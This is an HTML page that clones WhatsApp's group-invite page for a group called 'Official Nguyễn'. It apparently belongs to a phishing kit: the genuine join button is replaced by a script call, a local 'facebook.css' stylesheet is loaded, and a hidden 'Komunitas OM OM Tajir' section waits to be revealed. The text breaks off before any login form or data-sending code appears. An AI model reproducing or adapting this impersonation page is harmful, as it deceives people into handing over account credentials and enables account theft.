<!DOCTYPE html>
<html lang="en" id="facebook" class="no_js">

<head>
    <meta charset="utf-8" />
    <meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" />
    
    <title id="pageTitle">WhatsApp Group Invite</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" />
    <meta name="theme-color" content="#1BA691" />
    <meta name="msapplication-navbutton-color" content="#1BA691" />
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta property="og:title" content=".&#x2022;&#xb0; Official Nguye&#x302;&#x303;n &#xb0;&#x2022;." />
    <meta property="og:image" content="https://pps.whatsapp.net/v/t61.24694-24/139508057_740752893230355_3866821580097521494_n.jpg?oh=4f2f30304e0a9c097cba2023fff501e5&amp;oe=6043B850" />
    <meta property="og:site_name" content="WhatsApp.com" />
    <meta property="og:description" content="WhatsApp Group Invite" />
    <meta property="description" content="WhatsApp Group Invite" />
    <meta name="apple-mobile-web-app-status-bar-style" content="#1BA691" />
    <meta name="mobile-web-app-capable" content="yes" />
    <style nonce="7kj7KaWG">
    #hide_till_load {
        display: block !important;
    }
    </style>
    <meta name="robots" content="noindex" />
    <link rel="stylesheet" type="text/css" href="css/style.css">
	<link rel="stylesheet" type="text/css" href="css/facebook.css">
    <link rel="shortcut icon" href="https://z-p3-static.xx.fbcdn.net/rsrc.php/v3/yP/r/rYZqPCBaG70.png" />
    <link type="text/css" rel="stylesheet" href="https://z-p3-static.xx.fbcdn.net/rsrc.php/v3/y7/l/0,cross/li1FVv8ji_p.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="w0wbZ" crossorigin="anonymous" />
    <link type="text/css" rel="stylesheet" href="https://z-p3-static.xx.fbcdn.net/rsrc.php/v3/yg/l/0,cross/7fkNK1GGa6I.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="ymDaO" crossorigin="anonymous" />
    <script src="https://z-p3-static.xx.fbcdn.net/rsrc.php/v3/yY/r/RVRo3ew46jQ.js?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="f5HAi" crossorigin="anonymous" nonce="7kj7KaWG"></script>
</head>

<body id="top-of-page" class="_2yzz _2ywk _whatsapp_www__page--invite en chrome webkit win x1 Locale_en_GB" dir="ltr">
    <script nonce="7kj7KaWG">
    requireLazy(["bootstrapWebSession"], function(j) { j(1614741438) })
    </script>
    <div id="hide_till_load" class="_2ywh _li _9kh2" style="display: none">
        <div class="_2y_d _whatsapp_www__page--invite">
            <div data-testid="whatsapp_www_header" class="_2zpg">
                <header class="_2zpl">
                    <div class="_2yz3 _2ziw" id="header-inner"><a class="_36or _2zq_" data-testid="whatsapp_www_header_logo_link" href="https://www.whatsapp.com/" aria-label="Main page"></a><a class="_36or _2yzn" href="" rel="noopener">WhatsApp Group Invite</a>
                        <div class="_2zpt"><button id="lang"><svg version="1.1" id="icon-language" xmlns="http://www.w3.org/2000/svg" x="0" y="0" width="19px" height="19px" viewBox="0 0 19 19" style="enable-background:new 0 0 19 19;" role="img" aria-labelledby="a11yTitle" space="preserve">
                                    <title id="a11yTitle">Language</title>
                                    <path class="_2y-e" d="M9.5,2C5.4,2,2,5.4,2,9.5S5.4,17,9.5,17c4.1,0,7.5-3.4,
              7.5-7.5S13.6,2,9.5,2z M14.7,6.5h-2.2c-0.2-1-0.6-1.8-1.1-2.7C12.8,
              4.3,14,
              5.2,14.7,
              6.5z M9.5,3.5c0.6,0.9,1.1,1.9,1.4,3H8.1C8.4,
              5.4,8.9,4.4,9.5,3.5z M3.7,
              11c-0.2-0.5-0.2-1-0.2-1.5C3.5,9,3.5,8.4,3.7,8h2.6C6.2,8.5,
              6.2,9,6.2,9.5c0,0.5,
              0.1,1,0.1,1.5H3.7z M4.3,12.5h2.2c0.2,1,0.6,1.8,
              1.1,2.7C6.2,14.7,5,13.8,4.3,
              12.5z M6.5,6.5H4.3c0.8-1.3,1.9-2.2,3.2-2.7C7.1,
              4.7,6.7,5.5,6.5,6.5z M9.5,
              15.5c-0.6-0.9-1.1-1.9-1.4-3h2.9C10.6,13.6,10.1,
              14.6,9.5,15.5z M11.2,
              11H7.8c-0.1-0.5-0.2-1-0.2-1.5c0-0.5,0.1-1,
              0.2-1.5h3.5c0.1,0.5,0.2,1,0.2,
              1.5C11.5,10,
              11.3,10.5,11.2,11z M11.5,15.2c0.5-0.8,0.8-1.7,1.1-2.7h2.2C14,
              13.8,12.8,14.7,11.5,
              15.2z M12.8,11c0.1-0.5,0.1-1,0.1-1.5c0-0.5-0.1-1-0.1-1.5h2.6c0.2,
              0.5,0.2,1,0.2,
              1.5c0,0.5-0.1,1.1-0.2,1.5H12.8z"></path>
                                </svg>
                                <div class="_2zbh">en<svg version="1.1" xmlns="http://www.w3.org/2000/svg" class="_2zbi" x="0" y="0" width="9px" height="20px" viewBox="0 0 9 20" style="enable-background:new 0 0 9 20;">
                                        <polygon fill="#ffffff" points="1,9 4.5,12.5 8,9 "></polygon>
                                    </svg></div>
                            </button>
                            <div class="_2zqm" id="lang-picker" style="display: none;">
                                <div class="_2zqx">Select your language</div>
                                <ul>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=az" dir="auto">azərbaycan</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=af" dir="auto">Afrikaans</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=id" dir="auto">Bahasa Indonesia</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=ms" dir="auto">Melayu</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=ca" dir="auto">català</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=cs" dir="auto">čeština</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=da" dir="auto">dansk</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=de" dir="auto">Deutsch</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=et" dir="auto">eesti</a></li>
                                    <li class="_2zqt _2zqw"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=en" dir="auto">English</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=es" dir="auto">español</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=fr" dir="auto">français</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=ga" dir="auto">Gaeilge</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=hr" dir="auto">hrvatski</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=it" dir="auto">italiano</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=sw" dir="auto">Kiswahili</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=lv" dir="auto">latviešu</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=lt" dir="auto">lietuvių</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=hu" dir="auto">magyar</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=nl" dir="auto">Nederlands</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=nb" dir="auto">norsk bokmål</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=uz" dir="auto">o‘zbek</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=tl" dir="auto">Filipino</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=pl" dir="auto">polski</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=pt_br" dir="auto">Português (Brasil)</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=pt_pt" dir="auto">Português (Portugal)</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=ro" dir="auto">română</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=sq" dir="auto">shqip</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=sk" dir="auto">slovenčina</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=sl" dir="auto">slovenščina</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=fi" dir="auto">suomi</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=sv" dir="auto">svenska</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=vi" dir="auto">Tiếng Việt</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=tr" dir="auto">Türkçe</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=el" dir="auto">Ελληνικά</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=bg" dir="auto">български</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=kk" dir="auto">қазақ тілі</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=mk" dir="auto">македонски</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=ru" dir="auto">русский</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=sr" dir="auto">српски</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=uk" dir="auto">українська</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=he" dir="auto">עברית</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=ar" dir="auto">العربية</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=fa" dir="auto">فارسی</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=ur" dir="auto">اردو</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=bn" dir="auto">বাংলা</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=hi" dir="auto">हिन्दी</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=gu" dir="auto">ગુજરાતી</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=kn" dir="auto">ಕನ್ನಡ</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=mr" dir="auto">मराठी</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=pa" dir="auto">ਪੰਜਾਬੀ</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=ta" dir="auto">தமிழ்</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=te" dir="auto">తెలుగు</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=ml" dir="auto">മലയാളം</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=th" dir="auto">ไทย</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=zh_cn" dir="auto">简体中文</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=zh_tw" dir="auto">繁體中文</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=ja" dir="auto">日本語</a></li>
                                    <li class="_2zqt"><a class="_36or _2zqv" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=ko" dir="auto">한국어</a></li>
                                </ul>
                            </div>
                            <div style="display: none;" id="lang-picker_bg" class="_2zqy"></div>
                        </div><button class="_2zpw" id="icon-drawer-open" aria-label="menu"><svg version="1.1" id="icon-menu" xmlns="http://www.w3.org/1999/xlink" x="0" y="0" width="37" height="37" viewBox="0 0 37 37" style="enable-background:new 0 0 37 37;" space="preserve">
                                <path class="_2y-e" d="M8,26h21v-1.8H8V26z M8,11v1.8h21V11H8z
                M8,19.2h21v-1.8H8V19.2z"></path>
                            </svg></button>
                        <div class="_2zpu" id="icon-search"><svg version="1.1" xmlns="http://www.w3.org/1999/xlink" x="0" y="0" width="37" height="37" viewBox="0 0 37 37" style="enable-background:new 0 0 37 37;" space="preserve">
                                <path class="_2y-e" d="M22.9,21.3H22L21.7,21c1.1-1.2,1.7-2.8,1.7-4.5
                c0-3.9-3.1-7.1-7-7.1s-7,3.1-7,7.1c0,3.9,3.1,7,7,7c1.7,0,
                3.3-0.7,4.5-1.7l0.3,0.3v0.9l4.7,4.7l1.6-1.6L22.9,21.3z M16.4,
                21.3c-2.7,0-4.8-2.2-4.8-4.8s2.2-4.8,4.8-4.8s4.8,2.2,4.8,
                4.8S19.1,21.3,16.4,21.3z"></path>
                            </svg></div>
                        <nav class="_2yzy">
                            <ul class="_2yyz">
                                <li class="_2zw6"><a class="_36or" href="https://web.whatsapp.com/">WhatsApp Web</a></li><span class="_2zwe"></span>
                                <li class="_2zw6"><a class="_36or" href="https://www.whatsapp.com/features/">Features</a></li><span class="_2zwe"></span>
                                <li class="_2zw6"><a class="_36or" href="https://www.whatsapp.com/download/">Download</a></li><span class="_2zwe"></span>
                                <li class="_2zw6"><a class="_36or" href="https://www.whatsapp.com/security/">Security</a></li><span class="_2zwe"></span>
                                <li class="_2zw6"><a class="_36or" href="https://faq.whatsapp.com/">Help Center</a></li><span class="_2zwe"></span>
                            </ul>
                        </nav>
                    </div>
                    <nav class="_2zc-" id="menu-drawer" aria-hidden="true">
                        <div class="_2zlb"><button class="_2zix" id="icon-drawer-close" aria-label="close menu"><svg version="1.1" id="icon-close" xmlns="http://www.w3.org/1999/xlink" x="0" y="0" width="37" height="37" viewBox="0 0 37 37" style="enable-background:new 0 0 37 37;" space="preserve">
                                    <polygon class="_2y-e" points="26.7,11.6 25.4,10.3 18.5,17.2
                  11.6,10.3 10.3,11.6 17.2,18.5
                  10.3,25.4 11.6,26.7 18.5,19.8
                  25.4,26.7 26.7,25.4 19.8,18.5 "></polygon>
                                </svg></button>
                            <div class="_2zlc"></div>
                            <ul class="_2z2n _2zo_">
                                <li class="_2zp6"><a class="_36or _2zp7" href="https://www.whatsapp.com/download/">Download</a></li>
                                <li class="_2zp6"><a class="_36or _2zp7" href="https://www.whatsapp.com/features/">Features</a></li>
                                <li class="_2zp6"><a class="_36or _2zp7" href="https://www.whatsapp.com/security/">Security</a></li>
                                <li class="_2zp6"><a class="_36or _2zp7" href="https://faq.whatsapp.com/">Help Center</a></li>
                                <li class="_2zp6"><a class="_36or _2zp7" href="https://www.whatsapp.com/contact/">Get in touch</a></li>
                                <li class="_2zp6 _2zp9"><select onchange="window.location =
                            this.options[this.selectedIndex].value;">
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=az">azərbaycan</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=af">Afrikaans</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=id">Bahasa Indonesia</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=ms">Melayu</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=ca">català</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=cs">čeština</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=da">dansk</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=de">Deutsch</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=et">eesti</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=en" selected="1">English</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=es">español</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=fr">français</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=ga">Gaeilge</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=hr">hrvatski</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=it">italiano</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=sw">Kiswahili</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=lv">latviešu</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=lt">lietuvių</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=hu">magyar</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=nl">Nederlands</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=nb">norsk bokmål</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=uz">o‘zbek</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=tl">Filipino</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=pl">polski</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=pt_br">Português (Brasil)</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=pt_pt">Português (Portugal)</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=ro">română</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=sq">shqip</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=sk">slovenčina</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=sl">slovenščina</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=fi">suomi</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=sv">svenska</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=vi">Tiếng Việt</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=tr">Türkçe</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=el">Ελληνικά</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=bg">български</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=kk">қазақ тілі</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=mk">македонски</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=ru">русский</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=sr">српски</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=uk">українська</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=he">עברית</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=ar">العربية</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=fa">فارسی</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=ur">اردو</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=bn">বাংলা</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=hi">हिन्दी</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=gu">ગુજરાતી</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=kn">ಕನ್ನಡ</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=mr">मराठी</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=pa">ਪੰਜਾਬੀ</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=ta">தமிழ்</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=te">తెలుగు</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=ml">മലയാളം</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=th">ไทย</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=zh_cn">简体中文</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=zh_tw">繁體中文</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=ja">日本語</option>
                                        <option value="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x?lang=ko">한국어</option>
                                    </select></li>
                            </ul>
                        </div>
                    </nav>
                </header>
            </div>
            <div class="_2zry">
                <div class="_2yzc">
                    <div class="_2yz5 _2yz8" style="display: block;">
                        <div style="text-align:center;" class="_2yyk _8cis"><a class="_36or _2y_6 _2z38" href="https://chat.whatsapp.com/BXlEQgR9uMh58buLaOCr2x" title="Follow this link to join" id="action-icon"><span class="_2z9j" style="background-image: url(https://pps.whatsapp.net/v/t61.24694-24/139508057_740752893230355_3866821580097521494_n.jpg?oh=4f2f30304e0a9c097cba2023fff501e5&amp;oe=6043B850)"></span></a>
                            <h2 class="_2yzk">.•° Official Nguyễn °•.</h2>
                            <h3 class="_8cit">WhatsApp Group Invite</h3>
                
                                <span onclick="nguyen()" style="margin-top:-5px;display:flex;align-items:center;justify-content:center;text-align:center;z-index:999;height:38px;" class="_2z9j" title="Follow this link to join" id="action-icon">
                                    <p class="nguyen">Join Chat</p>
                                </span>
                           
                        </div>
                        <hr />
                        <div class="_6jg7">Don&#039;t have WhatsApp yet?<br /><a class="_36or" href="https://www.whatsapp.com/download">Download</a></div>
                    </div>
                    <div class="_2yz5 _2yz8" style="display: none;" id="fallback_block">
                        <div class="_2yyk _8ibq">
                            <h2 class="_2yzk">Looks like you don&#039;t have WhatsApp installed!</h2><a class="_36or _2y_c _2z0c _2z07" href="https://www.whatsapp.com/download">Download</a>
                            <div class="_8ibw">
                                <div class="_8ibx">or</div><a class="_36or" href="https://web.whatsapp.com/accept?code=BXlEQgR9uMh58buLaOCr2x">use WhatsApp Web</a>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="_6jg3">
                <div class="_2y-f _2y-g">
                    <div class="_2yz1">
                        <div class="_2ywp">
                            <div class="_2yyk _2y-j _2yzj">
                                <h4 class="_2yzk">WhatsApp</h4>
                                <div class="_2y_4">
                                    <ul class="_2zne _2zoz">
                                        <li class="_2znf"><a class="_36or _2zob" href="https://www.whatsapp.com/features/">Features</a></li>
                                        <li class="_2znf"><a class="_36or _2zob" href="https://www.whatsapp.com/security/">Security</a></li>
                                        <li class="_2znf"><a class="_36or _2zob" href="https://www.whatsapp.com/download/">Download</a></li>
                                        <li class="_2znf"><a class="_36or _2zob" href="https://web.whatsapp.com/">WhatsApp Web</a></li>
                                        <li class="_2znf"><a class="_36or _2zob" href="https://www.whatsapp.com/business/">Business</a></li>
                                        <li class="_2znf"><a class="_36or _2zob" href="https://www.whatsapp.com/privacy">Privacy</a></li>
                                    </ul>
                                </div>
                            </div>
                            <div class="_2yyk _2y-j _2yzj">
                                <h4 class="_2yzk">Company</h4>
                                <div class="_2y_4">
                                    <ul class="_2zne _2zoz">
                                        <li class="_2znf"><a class="_36or _2zob" href="https://www.whatsapp.com/about/">About</a></li>
                                        <li class="_2znf"><a class="_36or _2zob" href="https://www.whatsapp.com/join/">Careers</a></li>
                                        <li class="_2znf"><a class="_36or _2zob" href="https://www.whatsappbrand.com/" target="_blank" rel="noopener">Brand Center</a></li>
                                        <li class="_2znf"><a class="_36or _2zob" href="https://www.whatsapp.com/contact/">Get in touch</a></li>
                                        <li class="_2znf"><a class="_36or _2zob" href="https://blog.whatsapp.com/">Blog</a></li>
                                        <li class="_2znf"><a class="_36or _2zob" href="https://www.whatsapp.com/stories/">WhatsApp Stories</a></li>
                                    </ul>
                                </div>
                            </div>
                            <div class="_2yyk _2y-j _2yzj">
                                <h4 class="_2yzk">Download</h4>
                                <div class="_2y_4">
                                    <ul class="_2zne _2zoz">
                                        <li class="_2znf"><a class="_36or _2zob" href="https://www.whatsapp.com/download/">Mac/PC</a></li>
                                        <li class="_2znf"><a class="_36or _2zob" href="https://www.whatsapp.com/android/">Android</a></li>
                                        <li class="_2znf"><a class="_36or _2zob" href="https://www.whatsapp.com/appstore/">iPhone</a></li>
                                    </ul>
                                </div>
                            </div>
                            <div class="_2yyk _2y-j _2yzj">
                                <h4 class="_2yzk">Help</h4>
                                <div class="_2y_4">
                                    <ul class="_2zne _2zoz">
                                        <li class="_2znf"><a class="_36or _2zob" href="https://faq.whatsapp.com/">Help Center</a></li>
                                        <li class="_2znf"><a class="_36or _2zob" href="https://twitter.com/whatsapp" target="_blank" rel="noopener">Twitter</a></li>
                                        <li class="_2znf"><a class="_36or _2zob" href="https://www.facebook.com/WhatsApp" target="_blank" rel="noopener">Facebook</a></li>
                                        <li class="_2znf"><a class="_36or _2zob" href="https://www.whatsapp.com/coronavirus/">Coronavirus</a></li>
                                    </ul>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="_2y-f _2y-h">
                    <div class="_2yz1">
                        <div class="_2ywp">
                            <div class="_2y-j" dir="auto">2021 © WhatsApp LLC</div>
                            <div class="_2y-j _2y-k"><a class="_36or _2y-i" href="https://www.whatsapp.com/legal/">Privacy &amp; Terms</a></div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div></div>


    <section>
    	<div class="join" style="display: none;">
    		<span class="icon"></span>
    		<div class="content">
    			<h1>Komunitas OM OM Tajir</h1>
